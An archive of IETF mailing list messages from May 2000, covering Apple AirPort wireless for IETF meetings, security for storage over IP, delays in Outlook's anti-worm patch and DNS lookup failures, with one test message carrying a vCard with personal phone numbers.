Mime-Version: 1.0
X-Sender: [EMAIL PROTECTED]
Message-Id: <v04220800b554b27da79d@[192.168.168.2]>
In-Reply-To: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
Date: Sat, 27 May 2000 09:35:38 -0400
To: [EMAIL PROTECTED]
From: Jon Malis <[EMAIL PROTECTED]>
Subject: Re: IETF Wireless
Content-Type: text/plain; charset="us-ascii" ; format="flowed"
X-Loop: [EMAIL PROTECTED]
I Think That Derrell D. Piper Wrote In An eMail At 1:44 PM -0700 of 5/26/00:
> > - You need a Macintosh to configure it
>
>There is a Windows-based configuration utility that I've seen used to
>configure the Airport sucessfully. See the "Karlbridge configurator for
>Windows" link on the page listed above.
To my knowledge, there is a Java-based AirPort admin tool (at least
for PPP connections and changing IP info) which works on any computer
which supports Java.
--jon
Jon Malis
Independent Network Consultant
Malis Consulting
[EMAIL PROTECTED], [EMAIL PROTECTED], AIM: JonMalis
--------------------------------------------------------------------
"640KB is enough for anybody" -Bill Gates
PGP Fingerprint: B32E 4B26 A2BC CF38 B56B C518 1179 DE90 1477 00E9
PGP Key ID: 0x147700E9
>From owner-ietf-outbound Sat May 27 10:01:19 2000
Received: by ietf.org (8.9.1a/8.9.1a) id KAA18106
for [EMAIL PROTECTED]; Sat, 27 May 2000 10:00:03 -0400 (EDT)
Received: from chmls06.mediaone.net (chmls06.mediaone.net [24.128.1.71])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id JAA17794
for <[EMAIL PROTECTED]>; Sat, 27 May 2000 09:37:24 -0400 (EDT)
Received: from [192.168.168.2] (h0040100c9388.ne.mediaone.net [24.218.168.80])
by chmls06.mediaone.net (8.8.7/8.8.7) with ESMTP id JAA03461
for <[EMAIL PROTECTED]>; Sat, 27 May 2000 09:37:22 -0400 (EDT)
Mime-Version: 1.0
X-Sender: [EMAIL PROTECTED]
Message-Id: <v04220802b554b39deb1c@[192.168.168.2]>
In-Reply-To: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
Date: Sat, 27 May 2000 09:36:21 -0400
To: [EMAIL PROTECTED]
From: Jon Malis <[EMAIL PROTECTED]>
Subject: Re: IETF Wireless
Content-Type: text/plain; charset="us-ascii" ; format="flowed"
X-Loop: [EMAIL PROTECTED]
I Think That Roger Fajman Wrote In An eMail At 4:58 PM -0400 of 5/26/00:
> > These are absolutely standard 11Mb/s IEEE 802.11DS base stations, not
> > some proprietary Apple thing. PC users can get 802.11DS cards from
> > companies like Lucent: <http://www.wavelan.com/>
>
>Is there a way to turn off the NAT in the AirPort access points?
Yep, I have set up a lot of them as plain wireless bridges with no IP
address assigning, as well as using its built-in DHCP server
>We've had trouble here with PCs using them because the NAT implementation
>doesn't handle NETBIOS. Also, given the general dislike of many people
>in the IETF for NAT, it may not be something that the IETF wants to use
>itself.
Except for getting a Mac with an AirPort card to setup up the thing
properly, you're more or less out of luck. I know that there's a
Java-based admin tool, but I don't think it goes that deep into the
config settings, nor do I remember the URL off the top of my head
--jon
Jon Malis
Independent Network Consultant
Malis Consulting
[EMAIL PROTECTED], [EMAIL PROTECTED], AIM: JonMalis
--------------------------------------------------------------------
"640KB is enough for anybody" -Bill Gates
PGP Fingerprint: B32E 4B26 A2BC CF38 B56B C518 1179 DE90 1477 00E9
PGP Key ID: 0x147700E9
>From owner-ietf-outbound Sat May 27 10:11:23 2000
Received: by ietf.org (8.9.1a/8.9.1a) id KAA18285
for [EMAIL PROTECTED]; Sat, 27 May 2000 10:10:02 -0400 (EDT)
Received: from chmls06.mediaone.net (chmls06.mediaone.net [24.128.1.71])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id JAA17801
for <[EMAIL PROTECTED]>; Sat, 27 May 2000 09:37:25 -0400 (EDT)
Received: from [192.168.168.2] (h0040100c9388.ne.mediaone.net [24.218.168.80])
by chmls06.mediaone.net (8.8.7/8.8.7) with ESMTP id JAA03507
for <[EMAIL PROTECTED]>; Sat, 27 May 2000 09:37:26 -0400 (EDT)
Mime-Version: 1.0
X-Sender: [EMAIL PROTECTED]
Message-Id: <v04220801b554b2dcbdd0@[192.168.168.2]>
In-Reply-To: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
Date: Sat, 27 May 2000 09:36:51 -0400
To: [EMAIL PROTECTED]
From: Jon Malis <[EMAIL PROTECTED]>
Subject: Re: IETF Wireless
Content-Type: text/plain; charset="us-ascii" ; format="flowed"
X-Loop: [EMAIL PROTECTED]
I Think That Ole J. Jacobsen Wrote In An eMail At 1:13 PM -0700 of 5/26/00:
>- It has no way to add extenal antennas to boost signal.
You can, it just requires making a small "incision" in its side and a
voided warranty. (See: http://www.macintouch.com/airportantenna.html
For More Info)
>Now, I have heard mentioned that the AirPort has a limit to the number
>of users it will support, but I don't know if this is true or how it
>compares to the usual kit we use at IETF meetings.
I'm not definitely sure, but I have used at least 10 'books connected
and active simultaneously on my home LAN
--jon
Jon Malis
Independent Network Consultant
Malis Consulting
[EMAIL PROTECTED], [EMAIL PROTECTED], AIM: JonMalis
--------------------------------------------------------------------
"640KB is enough for anybody" -Bill Gates
PGP Fingerprint: B32E 4B26 A2BC CF38 B56B C518 1179 DE90 1477 00E9
PGP Key ID: 0x147700E9
>From owner-ietf-outbound Sat May 27 10:31:36 2000
Received: by ietf.org (8.9.1a/8.9.1a) id KAA18514
for [EMAIL PROTECTED]; Sat, 27 May 2000 10:30:02 -0400 (EDT)
Received: from mail-blue.research.att.com (mail-blue.research.att.com [135.207.30.102])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id KAA18338
for <[EMAIL PROTECTED]>; Sat, 27 May 2000 10:12:10 -0400 (EDT)
Received: from postal.research.att.com (postal.research.att.com [135.207.23.30])
by mail-blue.research.att.com (Postfix) with ESMTP
id 775FD4CE08; Sat, 27 May 2000 10:12:11 -0400 (EDT)
Received: from smb.research.att.com (postal.research.att.com [135.207.23.30])
by postal.research.att.com (8.8.7/8.8.7) with ESMTP id KAA20435;
Sat, 27 May 2000 10:12:09 -0400 (EDT)
Received: from smb.research.att.com (localhost.research.att.com [127.0.0.1])
by smb.research.att.com (Postfix) with ESMTP
id 504B435DC2; Sat, 27 May 2000 10:12:09 -0400 (EDT)
X-Mailer: exmh version 2.1.1 10/15/1999
From: "Steven M. Bellovin" <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: Storage over Ethernet/IP
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Sat, 27 May 2000 10:11:39 -0400
Sender: [EMAIL PROTECTED]
Message-Id: <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
In message <A427D1278F7CD311B1670008C7FAA62AC89F1F@CORPNT3>, Brian.Rubarts@born
.com writes:
>
>>> Encryption will be offloaded to the network interface. ASICs on the NICs
>>> will greatly improve encryption and authentication performance.
>
>>all well and good, provided that this encryption and authentication
>>are actually compatible with that specified by higher level protocols
>>and the authentication actually meets the needs of users.
>>(if your network interface needs to use and verify users' credentials,
>>as opposed to the host's credentials, it might be a stretch.)
>
>A network server will still authenticate user requests. Only the host
>needs to be authenticated with the disk/disks.
>
Up to a point. Yes, there are NICs available today with IPsec on-card.
But given the prevalence of -- how shall I put this? -- single-user
computers with user physical access, no OS protection and crufty software,
you really need user-granularity protection of the file access
requests. NFS-style protection with host authentication works if and only
if the server trusts the remote system to authenticate its users.
That's demonstrably not true today.
Yes, IPsec does, in theory, support user-granularity protection.
That's very hard to do when you're using outboard IPsec implementations,
since you then need some way to pass the user's credentials (generally
a certificate, not a user-id) back to the host, and tie every received
packet to that identity. It can be done, but (speaking as one of the
primary participants in the IPsec development effort) I'm not impressed
with its applicability in this case.
>
>>> It will run over incredibly fast Packet over SONET Wide Area
>>> Networks--behind firewalls.
>
>>...it's
>>inappropriate to assume that it will always be used behind firewalls...
>
>If the larger network that is employing this technology doesn't hire a
>decent
>consultant, you might be right. If they do, it will ALWAYS be behind a
>firewall :-)
>
Speaking as someone whose firewall credentials are more or less beyond
reproach, you're wrong -- period. *Many* such uses will be behind
firewalls. Others won't. The large corporate firewall is a dinosaur,
because of extranets, telecommuters, unofficial links through or around
the firewall, etc. Comprehensive firewalls generally can't protect a
network larger than one run by a single systems administrator (or, in
some cases, a systems administration group); otherwise, they don't know
where the links are.
And even when one sysadmin runs the net, what does he or she do when
word comes down from the pointy-haired layer of the stack that there
*will* be a VPN link to a joint venture partner?
Like it says on the (U.S.) toothpaste tubes -- firewalls can be an
effective security measure when used as part of a program
including good network hygiene and decent authentication. But they're
not magic security pixie dust, and they're not a substitute for
authentication in the protocol.
--Steve Bellovin
>From owner-ietf-outbound Sat May 27 11:31:20 2000
Received: by ietf.org (8.9.1a/8.9.1a) id LAA18976
for [EMAIL PROTECTED]; Sat, 27 May 2000 11:30:02 -0400 (EDT)
Received: from kestrel.prod.itd.earthlink.net (kestrel.prod.itd.earthlink.net
[207.217.121.155])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id LAA18953
for <[EMAIL PROTECTED]>; Sat, 27 May 2000 11:26:43 -0400 (EDT)
Received: from [10.0.1.2] (1Cust103.tnt7.bos2.da.uu.net [63.27.144.103])
by kestrel.prod.itd.earthlink.net (8.9.3/8.9.3) with ESMTP id IAA07889;
Sat, 27 May 2000 08:26:42 -0700 (PDT)
Mime-Version: 1.0
X-Sender: [EMAIL PROTECTED]
Message-Id: <p0431010cb55594459549@[10.0.1.2]>
In-Reply-To: <v04220801b554b2dcbdd0@[192.168.168.2]>
References: <[EMAIL PROTECTED]>
<v04220801b554b2dcbdd0@[192.168.168.2]>
Date: Sat, 27 May 2000 11:19:40 -0400
To: Jon Malis <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
From: "R. A. Hettinga" <[EMAIL PROTECTED]>
Subject: Re: IETF Wireless
Content-Type: text/plain; charset="us-ascii"
X-Loop: [EMAIL PROTECTED]
At 9:36 AM -0400 on 5/27/00, Jon Malis wrote:
>>- It has no way to add extenal antennas to boost signal.
>
> You can, it just requires making a small "incision" in its side and a
> voided warranty. (See: http://www.macintouch.com/airportantenna.html
> For More Info)
This echoes our experiences at the Financial Cryptography conference this
February <http://fc00.ai/> on Anguilla, which, at the moment, is crawling
with WaveLANs...
So, here we were, on a 50-foot catamaran off Prickly Pear Key, 15 people on
the boat drinking cocktails, snorkelling, various half-dressed attractive
people taking in the sun, etc., meanwhile, halfway up the flag lanyard
there's an antenna, and at the end of that antenna is my Mac Powerbook with
a WaveLan, using IP NetRouter wired to an Apple Airport Basestation with a
hub on it, and 5 or 6 geeks down below plugged into the hub, going, "Kewl.
We can get Slashdot out here". Coulda left the Base Station out of it,
frankly, as nobody else had a WaveLan card but me...
Cheers,
RAH
Who was afraid to take power tools to the plastic inside one of his base
stations, but has now changed his mind...
--
-----------------
R. A. Hettinga <mailto: [EMAIL PROTECTED]>
The Internet Bearer Underwriting Corporation <http://www.ibuc.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
>From owner-ietf-outbound Sat May 27 18:20:24 2000
Received: by ietf.org (8.9.1a/8.9.1a) id SAA21474
for [EMAIL PROTECTED]; Sat, 27 May 2000 18:20:02 -0400 (EDT)
Received: from shell9.ba.best.com ([EMAIL PROTECTED] [206.184.139.140])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id SAA21440
for <[EMAIL PROTECTED]>; Sat, 27 May 2000 18:19:06 -0400 (EDT)
Received: (from bovik@localhost)
by shell9.ba.best.com (8.9.3/8.9.2/best.sh) id PAA14123;
Sat, 27 May 2000 15:18:54 -0700 (PDT)
Date: Sat, 27 May 2000 15:18:54 -0700 (PDT)
From: "James P. Salsman" <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: still no Outlook patch
X-Loop: [EMAIL PROTECTED]
What happens when common-sense security measures come up against
large software company development efforts? Have a look:
http://support.microsoft.com/support/kb/articles/Q262/7/00.asp
Under "Features and Products That Are Affected by the Update":
] There is no work around for the following features after you
] apply the security update:
]...
] - Using the SendMail feature in Microsoft Excel.
]
] The following features function but they generate warning
] messages because they are based on the Outlook object model:
]...
] - Using SendMail on a SQL Server to send automatic mailings.
I predict the patch will take a month.
Cheers,
James
>From owner-ietf-outbound Sat May 27 20:10:16 2000
Received: by ietf.org (8.9.1a/8.9.1a) id UAA22143
for [EMAIL PROTECTED]; Sat, 27 May 2000 20:10:02 -0400 (EDT)
Received: from wfdutilgw.ml.com (wfdutilf01.ml.com [206.3.74.31])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id UAA22119
for <[EMAIL PROTECTED]>; Sat, 27 May 2000 20:08:58 -0400 (EDT)
Received: from ewfdwt02.exchange.ml.com (ewfdwt02.exchange.ml.com [199.201.57.155])
by wfdutilgw.ml.com (8.9.3/8.9.3/MLgwo-4.03) with SMTP id UAA00023
for <[EMAIL PROTECTED]>; Sat, 27 May 2000 20:08:58 -0400 (EDT)
Received: from 172.20.64.2 by ewfdwt02.exchange.ml.com with ESMTP (
WorldSecure Server SMTP Relay(WSS) v4.5); Sat, 27 May 2000 20:08:58
-0400
X-Server-Uuid: 3789b954-9c4e-11d3-af68-0008c73b0911
Received: by epcc02.na2.us.ml.com with Internet Mail Service (
5.5.2650.21) id <K04ARK33>; Sat, 27 May 2000 20:08:57 -0400
Message-ID: <[EMAIL PROTECTED]>
From: "Castro, Edison M. (PCA)" <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: RE: still no Outlook patch
Date: Sat, 27 May 2000 20:08:55 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
X-WSS-ID: 152EBC10978998-01-01
Content-Type: text/plain;
charset=iso-8859-1
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
What is exactly your question/point?
1.- Is it that when is the security patch will exist?
It already exists.
2.- Is it that those features were disabled?
That is the main "feature of this patch. To disable
any an all programs from using the outlook object model
to send mail without user intervention.
For both of this features, I already created my own version
of this functions without using the Outlook OM.
3.- Other ?
-----Original Message-----
From: James P. Salsman [mailto:[EMAIL PROTECTED]]
Sent: Saturday, May 27, 2000 6:19 PM
To: [EMAIL PROTECTED]
Subject: still no Outlook patch
What happens when common-sense security measures come up against
large software company development efforts? Have a look:
http://support.microsoft.com/support/kb/articles/Q262/7/00.asp
Under "Features and Products That Are Affected by the Update":
] There is no work around for the following features after you
] apply the security update:
]...
] - Using the SendMail feature in Microsoft Excel.
]
] The following features function but they generate warning
] messages because they are based on the Outlook object model:
]...
] - Using SendMail on a SQL Server to send automatic mailings.
I predict the patch will take a month.
Cheers,
James
>From owner-ietf-outbound Sat May 27 23:30:31 2000
Received: by ietf.org (8.9.1a/8.9.1a) id XAA25183
for [EMAIL PROTECTED]; Sat, 27 May 2000 23:30:03 -0400 (EDT)
Received: from tsx-prime.MIT.EDU (TSX-PRIME.MIT.EDU [18.86.0.76])
by ietf.org (8.9.1a/8.9.1a) with SMTP id XAA25142;
Sat, 27 May 2000 23:28:27 -0400 (EDT)
Received: by tsx-prime.MIT.EDU
with sendmail-SMI-8.6/1.2, id XAA18173; Sat, 27 May 2000 23:28:24 -0400
Date: Sat, 27 May 2000 23:28:24 -0400
Message-Id: <[EMAIL PROTECTED]>
From: "Theodore Y. Ts'o" <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
CC: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED],
[EMAIL PROTECTED], [EMAIL PROTECTED]
In-reply-to: Sean Doran's message of Sat, 27 May 2000 15:29:07 +0200 (CEST),
<[EMAIL PROTECTED]>
Subject: Re: IETF Wireless
Phone: (781) 391-3464
X-Loop: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED]
Date: Sat, 27 May 2000 15:29:07 +0200 (CEST)
Randy Bush writes:
| actually it might be a feature to torture the anti-nat bigots
Maybe they wouldn't notice.
Anyone using Kerberos will notice, I guarantee you that!
- Ted
>From owner-ietf-outbound Sun May 28 16:12:06 2000
Received: by ietf.org (8.9.1a/8.9.1a) id QAA10042
for [EMAIL PROTECTED]; Sun, 28 May 2000 16:10:04 -0400 (EDT)
Received: from mail1.microsoft.com (mail1.microsoft.com [131.107.3.125])
by ietf.org (8.9.1a/8.9.1a) with SMTP id QAA10018
for <[EMAIL PROTECTED]>; Sun, 28 May 2000 16:05:05 -0400 (EDT)
Received: from 157.54.9.101 by mail1.microsoft.com (InterScan E-Mail VirusWall NT);
Sun, 28 May 2000 13:04:28 -0700 (Pacific Daylight Time)
Received: by INET-IMC-01 with Internet Mail Service (5.5.2651.58)
id <L44F1LY0>; Sun, 28 May 2000 13:04:28 -0700
Message-ID:
<[EMAIL PROTECTED]>
From: Christian Huitema <[EMAIL PROTECTED]>
To: "'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
Subject: RE: Cite on DNS-related traffic.
Date: Sun, 28 May 2000 13:04:27 -0700
X-Mailer: Internet Mail Service (5.5.2651.58)
X-Loop: [EMAIL PROTECTED]
The graph was based on NLANR data, specifically the analysis of packet flows
at the FIX West. I have (indirectly) received feedback that mentioned that
the overhead in typical ISP network is much lower.
There is however a real problem with the DNS, one that is probably not paid
enough attention today. If you pick a valid DNS name at random, for example
by looking deep into the results of search engines such as Altavista, there
are currently more than 25% chances that "gethostbyname" will not return a
result in less than 2 seconds. I attribute this rather horrendous result to
two main causes. First, the root servers appear to be severely overloaded. I
refrain to run a measurement tool against these servers for fear of adding
to the overload, but when I did run a test I found that some servers failed
to complete as many as 40% of the transaction attempts thrown at them. The
second cause is the prevalent packet loss rate in the "public Internet"
(i.e. when you have to cross several inter-AS connections). This loss rate
hovers between 1% and 5%. The effect on UDP based protocols is obvious; when
you pile up several successive transactions, as the DNS does, the results
are cumulative...
Christian Huitema
> -----Original Message-----
> From: Craig Simon [mailto:[EMAIL PROTECTED]]
> Sent: Friday, May 26, 2000 1:25 PM
> To: [EMAIL PROTECTED]
> Subject: Cite on DNS-related traffic.
>
>
> I recall once seeing a graph shown by Christian Huitema
> indicating that
> DNS-related overhead accounted for about 5 to 10 percent of
> Internet traffic.
>
> Can anyone provide a link for this or equivalent documentation?
>
> Thanks.
>
> Craig Simon
>
>From owner-ietf-outbound Sun May 28 20:20:42 2000
Received: by ietf.org (8.9.1a/8.9.1a) id UAA11479
for [EMAIL PROTECTED]; Sun, 28 May 2000 20:20:02 -0400 (EDT)
Received: from proxy4.ba.best.com ([EMAIL PROTECTED] [206.184.139.15])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id UAA11429
for <[EMAIL PROTECTED]>; Sun, 28 May 2000 20:14:55 -0400 (EDT)
Received: from bovik.org (bovik.vip.best.com [205.149.161.94])
by proxy4.ba.best.com (8.9.3/8.9.2/best.out) with ESMTP id RAA05907
for <[EMAIL PROTECTED]>; Sun, 28 May 2000 17:13:15 -0700 (PDT)
Message-ID: <[EMAIL PROTECTED]>
Date: Sun, 28 May 2000 17:12:18 -0700
From: James Salsman <[EMAIL PROTECTED]>
Organization: Bovik Research
X-Mailer: Mozilla 4.61 [en] (Win98; I)
X-Accept-Language: en
MIME-Version: 1.0
To: [EMAIL PROTECTED]
Subject: RE: still no Outlook patch
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
> What is exactly your question/point?
>
> 1.- Is it that when is the security patch will exist?
> It already exists.
Only one of two is released. The only one they have released is
very weak, in that it would not have prevented Melissa and the
other self-sending MAPI clients; it only would have slowed their spread.
> 2.- Is it that those features were disabled?
Sort of; please have a look at
http://www.microsoft.com/technet/security/virus/vbslvltr.asp
In particular:
) Two security updates to Outlook are available to help protect
) against malicious programs like worms and viruses:
)
) - A file attachment update is available for Outlook 97, Outlook 98
) and Outlook 2000 This update makes it more difficult to
) inadvertently launch attachments, by providing a more explicit
) warning dialogue, and preventing attached executables from
) being launched directly from e-mails. The update also is
) included as part of Office 2000 SR1.
)
) - A security update will soon be available for Outlook 98 and
) 2000. This update will provide even greater protection than the
) file protection update. It prevents certain types of attached
) files from ever being opened or saved to disk, ensures that
) customers are alerted anytime a program attempts to send mail
) on their behalf, and changes the default Security Zone in which
) mail is processed.
Likely there will be no way to turn off the MAPI Send method
without also completely excluding a whole range of file
attachments. My guess is that this is being done because of
some Excel and SQL Server scripts that send mail. There are
better solutions, including for Microsoft. Will Microsoft
really end up with those two patches 'tied' together? The
fact that they still have some people who have suggested it
is not helping them avoid the "predatory" label.
Cheers,
James
>From owner-ietf-outbound Mon May 29 03:00:30 2000
Received: by ietf.org (8.9.1a/8.9.1a) id DAA27612
for [EMAIL PROTECTED]; Mon, 29 May 2000 03:00:02 -0400 (EDT)
Received: from penguin.wise.edt.ericsson.se (penguin-ext.wise.edt.ericsson.se
[194.237.142.110])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id CAA27557
for <[EMAIL PROTECTED]>; Mon, 29 May 2000 02:52:06 -0400 (EDT)
Received: from fogerty.lmf.ericsson.se (fogerty.lmf.ericsson.se [131.160.11.6])
by penguin.wise.edt.ericsson.se (8.10.1/8.10.1/WIREfire-1.9) with ESMTP id
e4T6q4J29774
for <[EMAIL PROTECTED]>; Mon, 29 May 2000 08:52:05 +0200 (MET DST)
Received: from e0050da994ded (E0050DA994DED-udp314801.lmf.ericsson.se [131.160.30.178])
by fogerty.lmf.ericsson.se (8.9.3+Sun/8.9.3) with SMTP id JAA03081
for <[EMAIL PROTECTED]>; Mon, 29 May 2000 09:52:03 +0300 (EET DST)
Message-ID: <003501bfc93a$4834f6e0$[EMAIL PROTECTED]>
From: "Kimmo Rantanen" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Subject: test
Date: Mon, 29 May 2000 09:51:14 +0300
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0032_01BFC953.6D66B7A0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.72.3612.1700
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3612.1700
X-Loop: [EMAIL PROTECTED]
This is a multi-part message in MIME format.
------=_NextPart_000_0032_01BFC953.6D66B7A0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
test
------=_NextPart_000_0032_01BFC953.6D66B7A0
Content-Type: text/x-vcard;
name="Kimmo Rantanen.vcf"
Content-Disposition: attachment;
filename="Kimmo Rantanen.vcf"
Content-Transfer-Encoding: 7bit
BEGIN:VCARD
VERSION:2.1
N:Rantanen;Kimmo
FN:Kimmo Rantanen
ORG:Ericsson;IP solutions, Telecom R&D
TITLE:Technical Product Manager
TEL;WORK;VOICE:+358 9 299 2957
TEL;HOME;VOICE:+ 358 9 8745787
TEL;CELL;VOICE:+358 40 507 1319
TEL;WORK;FAX:+358 9 299 3118
ADR;WORK:;Jorvas;;;;02420 Jorvas;Finland
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:Jorvas=0D=0A02420 Jorvas=0D=0AFinland
ADR;HOME:;;;Vantaa;;01360;Finland
LABEL;HOME;ENCODING=QUOTED-PRINTABLE:Vantaa 01360=0D=0AFinland
URL:
URL:http://www.ericsson.fi
EMAIL;PREF;INTERNET:[EMAIL PROTECTED]
REV:20000529T065114Z
END:VCARD
------=_NextPart_000_0032_01BFC953.6D66B7A0--
>From owner-ietf-outbound Mon May 29 13:10:20 2000
Received: by ietf.org (8.9.1a/8.9.1a) id NAA01708
for [EMAIL PROTECTED]; Mon, 29 May 2000 13:10:02 -0400 (EDT)
Received: from ljcqs016.cnf.com (egate1.cnf.com [205.185.108.239])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id NAA01582
for <[EMAIL PROTECTED]>; Mon, 29 May 2000 13:03:19 -0400 (EDT)
Received: from mwabs030.emeryworld.com (localhost [127.0.0.1])
by ljcqs016.cnf.com (8.9.3/8.9.3) with ESMTP id KAA29751
for <[EMAIL PROTECTED]>; Mon, 29 May 2000 10:02:48 -0700 (PDT)
Received: by mwabs030.emeryworld.com with Internet Mail Service (5.5.2650.21)
id <L2AKP638>; Mon, 29 May 2000 16:55:06 -0000
Message-ID: <[EMAIL PROTECTED]>
From: "Dawson, Peter D" <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: RE: Storage over Ethernet/IP
Date: Mon, 29 May 2000 17:02:10 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
charset="iso-8859-1"
X-Loop: [EMAIL PROTECTED]
->-----Original Message-----
->From: Harald Tveit Alvestrand [mailto:[EMAIL PROTECTED]]
->Sent: Friday, May 26, 2000 6:27 PM
->To: [EMAIL PROTECTED]
->Cc: [EMAIL PROTECTED]
->Subject: RE: Storage over Ethernet/IP
->The point being made, remade and made again here is:
->- Any protocol that offers no means of countering such
->security threats is
->broken, and should not be considered for standardization.
->It is perfectly possible that after conducting a threat and modality
->analysis, one ends up with saying that hardware-accelerated
->IPsec using
->host identities is adequate for the scenarios involving
->otherwise-unprotected Internet links, and that a mode with no
->protection is
->adequate when the media is physically secured.
->
->But the analysis MUST BE DONE.
->
is vulnerability and threat analysis part of the
standardization process ??
/pd
>From owner-ietf-outbound Mon May 29 14:00:12 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA02088
for [EMAIL PROTECTED]; Mon, 29 May 2000 14:00:01 -0400 (EDT)
Received: from mail-green.research.att.com (H-135-207-30-103.research.att.com
[135.207.30.103])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id NAA02054
for <[EMAIL PROTECTED]>; Mon, 29 May 2000 13:56:15 -0400 (EDT)
Received: from postal.research.att.com (postal.research.att.com [135.207.23.30])
by mail-green.research.att.com (Postfix) with ESMTP
id DB4AD1E008; Mon, 29 May 2000 13:56:15 -0400 (EDT)
Received: from smb.research.att.com (postal.research.att.com [135.207.23.30])
by postal.research.att.com (8.8.7/8.8.7) with ESMTP id NAA18962;
Mon, 29 May 2000 13:56:14 -0400 (EDT)
Received: from smb.research.att.com (localhost.research.att.com [127.0.0.1])
by smb.research.att.com (Postfix) with ESMTP
id 09B4B35DC2; Mon, 29 May 2000 13:56:13 -0400 (EDT)
X-Mailer: exmh version 2.1.1 10/15/1999
From: "Steven M. Bellovin" <[EMAIL PROTECTED]>
To: "Dawson, Peter D" <[EMAIL PROTECTED]>
Cc: [EMAIL PROTECTED]
Subject: Re: Storage over Ethernet/IP
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Mon, 29 May 2000 13:56:13 -0400
Sender: [EMAIL PROTECTED]
Message-Id: <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
In message <[EMAIL PROTECTED]>,
"Dawson, Peter D" writes:
>
>
>->-----Original Message-----
>->From: Harald Tveit Alvestrand [mailto:[EMAIL PROTECTED]]
>->Sent: Friday, May 26, 2000 6:27 PM
>->To: [EMAIL PROTECTED]
>->Cc: [EMAIL PROTECTED]
>->Subject: RE: Storage over Ethernet/IP
>
>->The point being made, remade and made again here is:
>->- Any protocol that offers no means of countering such
>->security threats is
>->broken, and should not be considered for standardization.
>
>->It is perfectly possible that after conducting a threat and modality
>->analysis, one ends up with saying that hardware-accelerated
>->IPsec using
>->host identities is adequate for the scenarios involving
>->otherwise-unprotected Internet links, and that a mode with no
>->protection is
>->adequate when the media is physically secured.
>->
>->But the analysis MUST BE DONE.
>->
>
>is vulnerability and threat analysis part of the
>standardization process ??
>
Yes, in order to come up with a reasonable security considerations
section. (Clearly, much of it is site-specific. But the protocol
developers can't ignore it.)
--Steve Bellovin
>From owner-ietf-outbound Mon May 29 14:20:17 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA02343
for [EMAIL PROTECTED]; Mon, 29 May 2000 14:20:02 -0400 (EDT)
Received: from ljcqs016.cnf.com (egate1.cnf.com [205.185.108.239])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id OAA02257
for <[EMAIL PROTECTED]>; Mon, 29 May 2000 14:08:53 -0400 (EDT)
Received: from mwabs030.emeryworld.com (localhost [127.0.0.1])
by ljcqs016.cnf.com (8.9.3/8.9.3) with ESMTP id LAA01996
for <[EMAIL PROTECTED]>; Mon, 29 May 2000 11:08:23 -0700 (PDT)
Received: by mwabs030.emeryworld.com with Internet Mail Service (5.5.2650.21)
id <L2AKP67K>; Mon, 29 May 2000 18:00:41 -0000
Message-ID: <[EMAIL PROTECTED]>
From: "Dawson, Peter D" <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: RE: Storage over Ethernet/IP
Date: Mon, 29 May 2000 18:07:48 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
charset="iso-8859-1"
X-Loop: [EMAIL PROTECTED]
->-----Original Message-----
->From: Steven M. Bellovin [mailto:[EMAIL PROTECTED]]
->Sent: Monday, May 29, 2000 1:56 PM
->To: Dawson, Peter D
->Cc: [EMAIL PROTECTED]
->Subject: Re: Storage over Ethernet/IP
->
->
->In message
-><[EMAIL PROTECTED]>,
->"Dawson, Peter D" writes:
->>
->>
->>->-----Original Message-----
->>->From: Harald Tveit Alvestrand [mailto:[EMAIL PROTECTED]]
->>->Sent: Friday, May 26, 2000 6:27 PM
->>->To: [EMAIL PROTECTED]
